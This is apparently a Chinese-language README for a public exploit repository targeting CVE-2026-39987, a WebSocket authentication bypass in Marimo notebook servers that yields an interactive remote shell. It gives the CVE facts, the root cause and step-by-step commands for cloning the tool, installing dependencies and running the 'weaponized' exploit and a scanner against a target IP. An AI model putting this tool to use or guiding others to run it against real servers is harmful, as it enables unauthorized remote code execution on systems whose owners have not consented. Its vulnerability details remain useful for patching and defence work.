** 漏洞利用框架 ** | 完整远程代码执行(RCE) | WebSocket 认证绕过
打开文件 website.html
该漏洞利用针对在端口 2718(默认)上运行 WebSocket 的 Marimo 应用程序。该漏洞允许通过 WebSocket 认证绕过实现未授权命令执行,使攻击者获得完整的远程代码执行能力。
| 属性 | 详情 |
|---|---|
| CVE ID | CVE-2026-39987 |
| 攻击向量 | WebSocket 认证绕过 |
| Shell 类型 | 交互式 PTY(伪终端) |
| 影响 | 完整远程代码执行(RCE) |
| CVSS 评分 | 9.3(严重) |
| 受影响版本 | Marimo ≤ 0.20.4 |
该漏洞存在于 Marimo 应用程序的 WebSocket 握手机制中。由于认证验证不当,攻击者可以:
根本原因:WebSocket 升级处理器中缺少认证检查,导致未授权命令注入。
# 克隆仓库
python3 -m venv venv
source venv/bin/activate
git clone https://github.com/mki9/CVE-2026-39987_exploit.git
cd CVE-2026-39987_exploit
chmod +x *
# 漏洞利用命令
* / 交互式 Shell(默认)
1 / python CVE-2026-39987_exploit.py <TARGET_IP>
* / help
2 / python CVE-2026-39987_exploit.py
# 安装所需依赖
pip install websocket-client colorama rich pyfiglet
python CVE-2026-39987_scanner.py
# 输入
[*] Weaponized WebSocket Exploit Test
[!] Authorized Use Only
[?] Enter target IP address or hostname:
>> <TARGET_IP>